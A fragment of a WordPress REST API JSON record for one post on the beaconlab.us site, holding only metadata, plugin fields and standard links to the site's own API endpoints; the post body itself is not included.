[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":10764,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[48],"tags":[],"class_list":["post-10734","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized"],"acf":[],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/beaconlab.us\/es\/wp-json\/wp\/v2\/posts\/10734","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/beaconlab.us\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/beaconlab.us\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/beaconlab.us\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/beaconlab.us\/es\/wp-json\/wp\/v2\/comments?post=10734"}],"version-history":[{"count":2,"href":"https:\/\/beaconlab.us\/es\/wp-json\/wp\/v2\/posts\/10734\/revisions"}],"predecessor-version":[{"id":10766,"href":"https:\/\/beaconlab.us\/es\/wp-json\/wp\/v2\/posts\/10734\/revisions\/10766"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/beaconlab.us\/es\/wp-json\/wp\/v2\/media\/10764"}],"wp:attachment":[{"href":"https:\/\/beaconlab.us\/es\/wp-json\/wp\/v2\/media?parent=10734"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/beaconlab.us\/es\/wp-json\/wp\/v2\/categories?post=10734"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/beaconlab.us\/es\/wp-json\/wp\/v2\/tags?post=10734"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}